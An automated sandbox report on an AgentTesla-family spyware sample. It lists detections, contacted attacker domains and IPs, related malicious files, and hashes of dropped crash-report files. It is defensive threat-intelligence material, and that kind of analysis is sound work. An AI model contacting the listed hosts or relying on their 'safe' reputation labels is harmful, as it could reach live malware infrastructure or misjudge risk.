                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      W7UbgU8x18.exe36%VirustotalBrowse
                      W7UbgU8x18.exe29%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      W7UbgU8x18.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.0.aspnet_regbrowsers.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                      2.0.aspnet_regbrowsers.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      2.0.aspnet_regbrowsers.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                      2.0.aspnet_regbrowsers.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                      2.2.aspnet_regbrowsers.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      2.0.aspnet_regbrowsers.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      odin.mk-host.com1%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://194.85.248.2190%Avira URL Cloudsafe
                      http://odin.mk-host.com1%VirustotalBrowse
                      http://odin.mk-host.com0%Avira URL Cloudsafe
                      http://194.85.248.219/token_ta992i.txt0%VirustotalBrowse
                      http://194.85.248.219/token_ta992i.txt0%Avira URL Cloudsafe
                      http://crl.comodoca0%Avira URL Cloudsafe
                      http://sGexjS.com0%Avira URL Cloudsafe
                      http://194.85.248.219/publickey.txt0%Avira URL Cloudsafe
                      http://m3kI8gc4jNB3oWFQtMC.org0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      odin.mk-host.com
                      		209.205.200.74
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://194.85.248.219/token_ta992i.txtfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://194.85.248.219/publickey.txtfalse
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierWerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                          		high
                          http://127.0.0.1:HTTP/1.1aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://DynDns.comDynDNSaspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://sectigo.com/CPS0aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.520908081.0000000006CC0000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                            		high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haaspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://194.85.248.219W7UbgU8x18.exe, 00000000.00000002.303285101.0000000002881000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphoneWerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephoneWerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                		high
                                http://upx.sf.netAmcache.hve.10.drfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceWerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                    		high
                                    http://odin.mk-host.comaspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmpfalse
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationWerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.oWerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidWerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                              		high
                                              http://crl.comodocaaspnet_regbrowsers.exe, 00000002.00000002.520908081.0000000006CC0000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://sGexjS.comaspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oWerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameW7UbgU8x18.exe, 00000000.00000002.303285101.0000000002881000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://m3kI8gc4jNB3oWFQtMC.orgaspnet_regbrowsers.exe, 00000002.00000002.519418805.000000000354A000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000003.465831512.00000000011A4000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.519494646.0000000003588000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipW7UbgU8x18.exe, 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    209.205.200.74
                                                    		odin.mk-host.comUnited States
                                                    		5508124SHELLSUStrue
                                                    194.85.248.219
                                                    		unknownRussian Federation
                                                    		35478DATACENTERROfalse

                                                    General Information

                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                    Analysis ID:528611
                                                    Start date:25.11.2021
                                                    Start time:14:59:18
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 8m 36s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:W7UbgU8x18 (renamed file extension from none to exe)
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:29
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/7@1/2
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 0.2% (good quality ratio 0.1%)
                                                    • Quality average: 41%
                                                    • Quality standard deviation: 41%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                    • TCP Packets have been reduced to 100
                                                    • Excluded IPs from analysis (whitelisted): 104.208.16.94, 20.54.110.249
                                                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    15:00:39API Interceptor726x Sleep call for process: aspnet_regbrowsers.exe modified
                                                    15:00:43API Interceptor1x Sleep call for process: WerFault.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    209.205.200.74Sales Pro forma invoice_SO0005303101427.docxGet hashmaliciousBrowse
                                                      YaMfg60AB4.exeGet hashmaliciousBrowse
                                                        EDyyOwFu2Y.rtfGet hashmaliciousBrowse
                                                          cwSfuiHmL1.exeGet hashmaliciousBrowse
                                                            HqCYq1FI94.rtfGet hashmaliciousBrowse
                                                              2G37r9n60v.exeGet hashmaliciousBrowse
                                                                PI-#U00dcRN.Z#U00dcCC.LTD #U015eT.docxGet hashmaliciousBrowse
                                                                  ujbZuYEbJR.exeGet hashmaliciousBrowse
                                                                    INVOICE - FIRST 2 CONTAINERS 111.xlsxGet hashmaliciousBrowse
                                                                      ZngI6XZfV9.exeGet hashmaliciousBrowse
                                                                        0DjNfigrSU.exeGet hashmaliciousBrowse
                                                                          CERAMIC VASE%0D%0A (3X40HQ).xlsxGet hashmaliciousBrowse
                                                                            I7P5KZHgki.exeGet hashmaliciousBrowse
                                                                              Order Confirmation AB22-00569.xlsxGet hashmaliciousBrowse
                                                                                PO_SC83994.docxGet hashmaliciousBrowse
                                                                                  veuN0vTYpY.exeGet hashmaliciousBrowse
                                                                                    6eqc2eIrv4.exeGet hashmaliciousBrowse
                                                                                      JJsI4Pb10I.exeGet hashmaliciousBrowse
                                                                                        PO-367M.xlsxGet hashmaliciousBrowse
                                                                                          1tDAoT9EWD.exeGet hashmaliciousBrowse
                                                                                            194.85.248.219Sales Pro forma invoice_SO0005303101427.docxGet hashmaliciousBrowse
                                                                                            • 194.85.248.219/publickey.txt

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                            odin.mk-host.comSales Pro forma invoice_SO0005303101427.docxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            YaMfg60AB4.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            EDyyOwFu2Y.rtfGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            cwSfuiHmL1.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            HqCYq1FI94.rtfGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            2G37r9n60v.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            PI-#U00dcRN.Z#U00dcCC.LTD #U015eT.docxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            ujbZuYEbJR.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            INVOICE - FIRST 2 CONTAINERS 111.xlsxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            ZngI6XZfV9.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            0DjNfigrSU.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            CERAMIC VASE%0D%0A (3X40HQ).xlsxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            I7P5KZHgki.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            Order Confirmation AB22-00569.xlsxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            PO#SC83994.docxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            PO_SC83994.docxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            veuN0vTYpY.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            EB54JNfpvd.rtfGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            6eqc2eIrv4.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            JJsI4Pb10I.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74

                                                                                            ASN

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                            24SHELLSUSSales Pro forma invoice_SO0005303101427.docxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            YaMfg60AB4.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            EDyyOwFu2Y.rtfGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            cwSfuiHmL1.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            HqCYq1FI94.rtfGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            2G37r9n60v.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            PI-#U00dcRN.Z#U00dcCC.LTD #U015eT.docxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            Linux_amd64Get hashmaliciousBrowse
                                                                                            • 209.205.221.250
                                                                                            ujbZuYEbJR.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            INVOICE - FIRST 2 CONTAINERS 111.xlsxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            ZngI6XZfV9.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            AWB1145235666.PDF.vbsGet hashmaliciousBrowse
                                                                                            • 209.205.207.130
                                                                                            0DjNfigrSU.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            CERAMIC VASE%0D%0A (3X40HQ).xlsxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            I7P5KZHgki.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            Order Confirmation AB22-00569.xlsxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            RFQ #CNXT-HG20211109.exeGet hashmaliciousBrowse
                                                                                            • 192.119.9.178
                                                                                            PO_SC83994.docxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            veuN0vTYpY.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            6eqc2eIrv4.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            DATACENTERROSK TAX INV.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.250
                                                                                            xA7ry4Ewuk.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.167
                                                                                            Sales Pro forma invoice_SO0005303101427.docxGet hashmaliciousBrowse
                                                                                            • 194.85.248.219
                                                                                            Statement from QNB.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.156
                                                                                            CV.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.250
                                                                                            INV.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.250
                                                                                            CV.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.250
                                                                                            TMR590241368.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.115
                                                                                            vIyyHkRXJnGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            267A80yAhpGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            QJYxAALd23Get hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            z4bJfjXDDQGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            XXaLHoecGpGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            AGiCic4uDzGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            3B3BMxYG8nGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            6WMo1OYmk3Get hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            dycuTng5W8Get hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            xINX4f5M8sGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            SSIuSyaBAFGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            IMG600094173852.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.115

                                                                                            JA3 Fingerprints

                                                                                            No context

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_W7UbgU8x18.exe_31f1e8177b64c27c98341b539e8a5b3c0473765_6dc08ccc_19fa331d\Report.wer
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):65536
                                                                                            Entropy (8bit):1.096973568105997
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:2lnAlyoZooaHBUZMXSaKsUAe5Z/u7s0S274It9:onAUiolBUZMXSaluZ/u7s0X4It9
                                                                                            MD5:02EF02D2B701A2F22EF28F8A91B293DD
                                                                                            SHA1:0AC42F26155E7234072A6050D6689DF870D4C778
                                                                                            SHA-256:8C11AC9C42AC81E3851DFC5F567C85B713A6BC46755D001BFD43E0B0E127FE4C
                                                                                            SHA-512:BF9A6AF55EA1993BC0809A461447C7270F8D23808CF5E1CFFDC7022ABF0B6C52AD6C4CCC817C9E4BA205800DB123F15A9FFC7B58BCC8793B41DB87DDA77F280A
                                                                                            Malicious:true
                                                                                            Reputation:low
                                                                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.3.5.4.8.3.1.1.8.9.5.0.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.2.3.5.4.8.4.2.0.9.5.7.1.3.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.9.1.e.9.5.3.-.e.7.a.1.-.4.a.7.3.-.9.3.b.b.-.d.3.c.7.6.2.6.6.0.4.8.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.4.a.6.3.9.e.-.3.e.8.3.-.4.4.d.f.-.a.b.8.7.-.a.1.6.2.9.d.1.9.0.c.a.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.7.U.b.g.U.8.x.1.8...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.t.u.n.e.r.a.i.d.f.i.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.0.c.-.0.0.0.1.-.0.0.1.6.-.0.9.c.2.-.6.3.3.6.5.0.e.2.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.5.c.7.b.2.7.4.d.0.f.e.5.3.2.e.f.b.8.e.5.2.c.f.9.5.6.3.4.0.0.b.0.0.0.0.0.0.0.0.!.0.0.0.0.c.4.2.7.8.c.f.2.5.d.a.5.2.a.d.c.0.5.f.4.d.2.1.6.1.a.1.1.c.7.b.9.6.
                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B51.tmp.WERInternalMetadata.xml
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):8396
                                                                                            Entropy (8bit):3.696838818148438
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:Rrl7r3GLNiGq6E6YIqSUeEQgmfZeVSNCprC89bZesfDmIzm:RrlsNiz6E6YFSUeEQgmfiSeZdfSx
                                                                                            MD5:4CE5FAD37F9ED557C1C5490697F78059
                                                                                            SHA1:0E0871C79981EF7D2487AFA0963C88E9139CB643
                                                                                            SHA-256:3E3AB02E3555C551DD8EE205CF9C3F20D04C2828C78F30C5CC33A74D1A4EE650
                                                                                            SHA-512:5A0C146FE0650ACCAF568A62517F8FA4DA12ABC57C8A88E18CB9FA36BA0E7F10B3279860999972D20A4D0FD3FDA7EE11C83B830789E30F255C892E039728579C
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.4.4.<./.P.i.d.>.......
                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1F68.tmp.xml
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4740
                                                                                            Entropy (8bit):4.465185228666966
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:cvIwSD8zsVJgtWI986WSC8BAo8fm8M4J5Ly2FQ+q8vTLyUm7n1jd:uITfvH7SNMJAKVmz1jd
                                                                                            MD5:453D8F13ADC28961F1969B8D331506E0
                                                                                            SHA1:2A5C9392FE9F6A8AFAFE3F56039526D9C87A6C43
                                                                                            SHA-256:74DE17553E832B589ACE03BEBF313EBB6A10F40DA1BD789F309E6BC2E842D5C6
                                                                                            SHA-512:1C06C173C348A3F2B479D1E33B40546AD3659273DCEF57FC0ACA1F89C92DDBE36A50D2CCF33BEA295218C1F10A0C74E43B500B2423501E1FB06C660BF2FE918E
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1270571" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER343.tmp.dmp
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:Mini DuMP crash report, 15 streams, Thu Nov 25 23:00:36 2021, 0x1205a4 type
                                                                                            Category:dropped
                                                                                            Size (bytes):265465
                                                                                            Entropy (8bit):4.033325209537863
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:cW5Eyjd+pSH0Nm9gIOgF5vUosoYo0WUCgUqOYD:cW5+py089RpD8mYo/Tj
                                                                                            MD5:61DEC122981DCBAF67F08434AC469B4A
                                                                                            SHA1:0A6176FB439D97D67B6BB2FB35E1389297257695
                                                                                            SHA-256:EA7D144F9261ED3EF91EC2C581E1C1DCFF59D4C35A4B72BA162EE0D7F0D749D0
                                                                                            SHA-512:65363992A31A8DCB06C79F5D6AE9D77EC54674BE389A32E901374A7BD485F650AA1586CC52F513EFB51901094523D1C4290428F2D74940751C14569B08415B5C
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: MDMP....... ..........a............D...............X.......<....#.......*...Q..........`.......8...........T............6..............T#..........@%...................................................................U...........B.......%......GenuineIntelW...........T..............a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Windows\appcompat\Programs\Amcache.hve
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                            Category:dropped
                                                                                            Size (bytes):1572864
                                                                                            Entropy (8bit):4.268220487373255
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:nYwMHc2yn+SCXqM+mxefKlphce5T7h0MMOb9PeLcuD7ZowN8EwDo3uu/:YwMHc2yn+SCXqM+BYto/
                                                                                            MD5:B5F6B82A5212B44A94CBE12A338DB812
                                                                                            SHA1:CC1A390F17462BB005F4896918345FB4BC15204B
                                                                                            SHA-256:C8611DE05BEFFE985DEA2AE15A55989FBBD0BA83419F7374DCF107C8AF90C203
